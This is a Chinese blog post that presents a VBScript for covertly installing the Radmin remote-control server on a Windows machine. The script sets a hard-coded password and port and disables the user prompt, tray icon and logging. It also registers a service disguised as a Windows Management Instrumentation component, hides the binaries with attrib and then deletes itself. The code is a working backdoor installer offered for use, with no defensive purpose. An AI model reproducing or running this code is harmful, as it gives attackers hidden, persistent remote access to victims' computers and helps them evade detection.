温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Vbs脚本如何实现radmin删除自身

发布时间:2021-09-29 18:16:07 来源:亿速云 阅读:178 作者:小新 栏目:开发技术

这篇文章主要为大家展示了“Vbs脚本如何实现radmin删除自身”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Vbs脚本如何实现radmin删除自身”这篇文章吧。

代码如下:

on error resume next  
const HKEY_LOCAL_MACHINE = &H80000002  
strComputer = "."  
Set StdOut = WScript.StdOut  
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_   
strComputer & "\root\default:StdRegProv")  
strKeyPath = "SYSTEM\RAdmin"  
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
strKeyPath = "SYSTEM\RAdmin\v2.0"  
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"  
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"  
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"  
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")  
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"  
uBinary = Array(0,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)  
uBinary = Array(0,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)  
uBinary = Array(1,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)  
uBinary = Array(0,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)  
uBinary = Array(0,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)  
uBinary = Array(0,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)  
uBinary = Array(0,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)  
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)        //此为注册表导出十六进制转为十进制数据 pass:241241241  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)    //Radmin密码  
uBinary = Array(5,4,0,0)      //端口:1029  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)  
uBinary = Array(10,0,0,0)  
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)  
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")  
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"  
strValueName = "LogFilePath"  
strValue = "c:\logfile.txt"  
set wshshell=createobject ("wscript.shell")  
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)  
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")  
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"  
strValueName = "Description"  
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."  
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  
strValueName = "DisplayName"  
strValue = "Windows Management Instrumentation Player Drivers"  
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  
strValueName = "ImagePath"  
strValue = "c:\windows\system32\Exporer.exe /service"  
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue  
set wshshell=createobject ("wscript.shell")  
a=wshshell.run ("net start WinManageHelp",0)  
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)  
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0)  
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)  
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)    //自删除

最好的删除代码不错

createobject("scripting.filesystemobject").deletefile(script.scriptname)

以上是“Vbs脚本如何实现radmin删除自身”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注亿速云行业资讯频道!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI